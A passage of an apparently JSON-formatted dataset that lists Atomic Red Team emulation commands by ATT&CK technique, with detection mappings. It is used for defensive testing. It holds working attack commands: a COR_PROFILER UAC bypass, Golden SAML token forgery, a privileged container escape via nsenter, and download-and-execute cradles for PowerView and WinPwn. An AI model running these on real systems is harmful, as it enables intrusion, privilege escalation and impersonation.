HKCU:Software\\Classes\\CLSID\\#{clsid_guid}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\\InprocServer32\" -Value #{file_name} -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "cleanup_command": "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -Force -ErrorAction Ignore | Out-Null\n", + "name": "powershell" + } + }, + { + "name": "System Scope COR_PROFILER", + "auto_generated_guid": "f373b482-48c8-4ce4-85ed-d40c8b3f7310", + "description": "Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.\nThe unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity\nlevel of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. 
If the account used is not a local administrator the profiler DLL will\nstill execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.\n\nReference: https://redcanary.com/blog/cor_profiler-for-persistence/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "unmanaged profiler DLL", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll" + }, + "clsid_guid": { + "description": "custom clsid guid", + "type": "String", + "default": "{09108e71-974c-4010-89cb-acf471ae9e2c}" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "#{file_name} must be present\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" + } + ], + "executor": { + "command": "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\n", + "cleanup_command": "Remove-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path 
'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -Force -ErrorAction Ignore | Out-Null\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Registry-free process scope COR_PROFILER", + "auto_generated_guid": "79d57242-bbef-41db-b301-9d01d9f6e817", + "description": "Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.\n\nReference: https://redcanary.com/blog/cor_profiler-for-persistence/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "unamanged profiler DLL", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll" + }, + "clsid_guid": { + "description": "custom clsid guid", + "type": "String", + "default": "{09108e71-974c-4010-89cb-acf471ae9e2c}" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "#{file_name} must be present\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" + } + ], + "executor": { + "command": "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '#{clsid_guid}'\n$env:COR_PROFILER_PATH = '#{file_name}'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "cleanup_command": "$env:COR_ENABLE_PROFILING = 0\n$env:COR_PROFILER = ''\n$env:COR_PROFILER_PATH = ''\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + 
"data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1606.002", + "command_list": [ + "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \".\\ADFS_signing.pfx\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden 
SAML\"\n", + "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"aehgdqBTZV50DKQZmNJ8mg==\" -PfxFileName \"#{certificate_path}\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \"#{certificate_path}\" -Issuer \"http://contoso.com/adfs/services/trust/\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n" + ], + "commands": [ + { + "command": "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \".\\ADFS_signing.pfx\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "source": "atomics/T1606.002/T1606.002.yaml", + "name": "Atomic Red Team Test - Forge Web Credentials: SAML token" + }, + { + "command": "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"aehgdqBTZV50DKQZmNJ8mg==\" -PfxFileName \"#{certificate_path}\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "source": "atomics/T1606.002/T1606.002.yaml", + "name": "Atomic Red Team Test - Forge Web Credentials: SAML token" + }, + { + "command": "Import-Module AADInternals -Force\n$saml = 
New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \"#{certificate_path}\" -Issuer \"http://contoso.com/adfs/services/trust/\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "source": "atomics/T1606.002/T1606.002.yaml", + "name": "Atomic Red Team Test - Forge Web Credentials: SAML token" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1606.002", + "display_name": "Forge Web Credentials: SAML token", + "atomic_tests": [ + { + "name": "Golden SAML", + "auto_generated_guid": "b16a03bc-1089-4dcc-ad98-30fe8f3a2b31", + "description": "Forge a \"Golden SAML\" token which allows to impersonate any Azure AD user, and authenticate to AADGraph (as a proof). \nYou will need the ADFS token signing certificate (see T1552.004 to export it).\nMore info here : https://o365blog.com/post/adfs/\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "certificate_path": { + "description": "Token signing certificate path. See T1552.004 to export it", + "type": "Path", + "default": ".\\ADFS_signing.pfx" + }, + "immutable_id": { + "description": "ImmutableId of the targeted user. 
It can be obtained with AzureAD powershell module; $(Get-AzureADUser -SearchString \"username\").ImmutableId", + "type": "String", + "default": "aehgdqBTZV50DKQZmNJ8mg==" + }, + "issuer_uri": { + "description": "Issuer URI of the ADFS service", + "type": "String", + "default": "http://contoso.com/adfs/services/trust/" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AADInternals module must be installed.\n", + "prereq_command": "if (Get-Module AADInternals) {exit 0} else {exit 1}\n", + "get_prereq_command": "Install-Module -Name AADInternals -Force\n" + } + ], + "executor": { + "command": "Import-Module AADInternals -Force\n$saml = New-AADIntSAMLToken -ImmutableID \"#{immutable_id}\" -PfxFileName \"#{certificate_path}\" -Issuer \"#{issuer_uri}\"\n$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache\nif ($conn) { Write-Host \"`nSuccessfully connected as $($conn.User)\" } else { Write-Host \"`nThe connection failed\" }\nWrite-Host \"End of Golden SAML\"\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in 
order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential creation", + "description": "A web credential was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "web credential" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 
365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ] + ] + }, + { + "technique_id": "T1609", + "command_list": [ + "kubectl create -f src/busybox.yaml -n default\nkubectl exec -n default busybox -- #{command}\n", + "kubectl create -f src/busybox.yaml -n #{namespace}\nkubectl exec -n #{namespace} busybox -- uname\n" + ], + "commands": [ + { + "command": "kubectl create -f src/busybox.yaml -n default\nkubectl exec -n default busybox -- #{command}\n", + "source": "atomics/T1609/T1609.yaml", + "name": "Atomic Red Team Test - Kubernetes Exec Into Container" + }, + { + "command": "kubectl create -f src/busybox.yaml -n #{namespace}\nkubectl exec -n #{namespace} busybox -- uname\n", + "source": "atomics/T1609/T1609.yaml", + "name": "Atomic Red Team Test - Kubernetes Exec Into Container" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1609", + "display_name": "Kubernetes Exec Into Container", + "atomic_tests": [ + { + "name": "ExecIntoContainer", + "auto_generated_guid": "d03bfcd3-ed87-49c8-8880-44bb772dea4b", + "description": "Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (\u201ckubectl exec\u201d). 
In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using \u201ckubectl exec\u201d.\n", + "supported_platforms": [ + "containers" + ], + "input_arguments": { + "namespace": { + "description": "K8s namespace to use", + "type": "String", + "default": "default" + }, + "command": { + "description": "Command to run", + "type": "String", + "default": "uname" + } + }, + "dependencies": [ + { + "description": "kubectl must be installed\n", + "get_prereq_command": "echo \"kubectl must be installed manually\"\n", + "prereq_command": "which kubectl\n" + } + ], + "executor": { + "command": "kubectl create -f src/busybox.yaml -n #{namespace}\nkubectl exec -n #{namespace} busybox -- #{command}\n", + "cleanup_command": "kubectl delete pod busybox -n #{namespace}\n", + "name": "bash", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script 
interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1611", + "command_list": [ + "kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{\"spec\":{\"hostPID\": true, \"containers\":[{\"name\":\"1\",\"image\":\"alpine\",\"command\":[\"nsenter\",\"--mount=/proc/1/ns/mnt\",\"--\",\"/bin/bash\"],\"stdin\": true,\"tty\":true,\"securityContext\":{\"privileged\":true}}]}}'\n" + ], + "commands": [ + { + "command": "kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{\"spec\":{\"hostPID\": true, \"containers\":[{\"name\":\"1\",\"image\":\"alpine\",\"command\":[\"nsenter\",\"--mount=/proc/1/ns/mnt\",\"--\",\"/bin/bash\"],\"stdin\": true,\"tty\":true,\"securityContext\":{\"privileged\":true}}]}}'\n", + "source": "atomics/T1611/T1611.yaml", + "name": "Atomic Red Team Test - Escape to Host" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1611", + "display_name": "Escape to Host", + "atomic_tests": [ + { + "name": "Deploy container using nsenter container escape", + "auto_generated_guid": "0b2f9520-a17a-4671-9dba-3bd034099fff", + "description": "In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. 
Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container.\n\nAdditional Details:\n- https://twitter.com/mauilion/status/1129468485480751104\n- https://securekubernetes.com/scenario_2_attack/\n", + "supported_platforms": [ + "containers" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify docker is installed.", + "prereq_command": "which docker\n", + "get_prereq_command": "if [ \"\" == \"`which docker`\" ]; then echo \"Docker Not Found\"; if [ -n \"`which apt-get`\" ]; then sudo apt-get -y install docker ; elif [ -n \"`which yum`\" ]; then sudo yum -y install docker ; fi ; else echo \"Docker installed\"; fi\n" + }, + { + "description": "Verify docker service is running.", + "prereq_command": "sudo systemctl status docker\n", + "get_prereq_command": "sudo systemctl start docker\n" + }, + { + "description": "Verify kind is in the path.", + "prereq_command": "which kind\n", + "get_prereq_command": "curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64\nchmod +x ./kind\nmv kind /usr/bin/kind\n" + }, + { + "description": "Verify kind-atomic-cluster is created", + "prereq_command": "sudo kind get clusters\n", + "get_prereq_command": "sudo kind create cluster --name atomic-cluster\n" + }, + { + "description": "Verify kubectl is in path", + "prereq_command": "which kubectl\n", + "get_prereq_command": "curl -LO \"https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl\"\nchmod +x ./kubectl\nmv kubectl /usr/bin/kubectl\n" + } + ], + "executor": { + "command": "kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{\"spec\":{\"hostPID\": true, \"containers\":[{\"name\":\"1\",\"image\":\"alpine\",\"command\":[\"nsenter\",\"--mount=/proc/1/ns/mnt\",\"--\",\"/bin/bash\"],\"stdin\": true,\"tty\":true,\"securityContext\":{\"privileged\":true}}]}}'\n", 
+ "name": "sh", + "cleanup_command": "kubectl --context kind-atomic-cluster delete pod atomic-escape-pod\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": 
"Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1614.001", + "command_list": [ + "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\n", + "chcp\n" + ], + "commands": [ + { + "command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\n", + "source": "atomics/T1614.001/T1614.001.yaml", + "name": "Atomic Red Team Test - System Location Discovery: System Language Discovery" + }, + { + "command": "chcp\n", + "source": "atomics/T1614.001/T1614.001.yaml", + "name": "Atomic Red Team Test - System Location Discovery: System Language Discovery" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1614.001", + "display_name": "System Location Discovery: System Language Discovery", + "atomic_tests": [ + { + "name": "Discover System Language by Registry Query", + "auto_generated_guid": "631d4cf1-42c9-4209-8fe9-6bd4de9421be", + "description": "Identify System language by querying the registry on an endpoint. 
\n\nUpon successful execution, result in number format can be looked up to correlate the language.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\n", + "name": "command_prompt" + } + }, + { + "name": "Discover System Language with chcp", + "auto_generated_guid": "d91473ca-944e-477a-b484-0e80217cd789", + "description": "Identify System language with the chcp command.\n\nUpon successful execution, result in number format can be looked up to correlate the language.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "chcp\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1615", + "command_list": [ + "gpresult /z\n", + "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO\"", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPOAudit -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPORemoteAccessPolicy -consoleoutput -noninteractive", + "Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> $env:temp\\GPO_Output.txt", + "Get-GPO -Domain $ENV:userdnsdomain -All >> #{gpo_output}" + ], + "commands": [ + { + "command": "gpresult /z\n", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + 
"command": "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO\"", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPOAudit -noninteractive -consoleoutput", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPORemoteAccessPolicy -consoleoutput -noninteractive", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> $env:temp\\GPO_Output.txt", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + }, + { + "command": "Get-GPO -Domain $ENV:userdnsdomain -All >> #{gpo_output}", + "source": "atomics/T1615/T1615.yaml", + "name": "Atomic Red Team Test - Group Policy Discovery" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1615", + "display_name": "Group Policy Discovery", + "atomic_tests": [ + { + "name": "Display group policy information via gpresult", + "auto_generated_guid": "0976990f-53b1-4d3f-a185-6df5be429d3b", + "description": "Uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information for a remote user and computer\nThe /z parameter displays all 
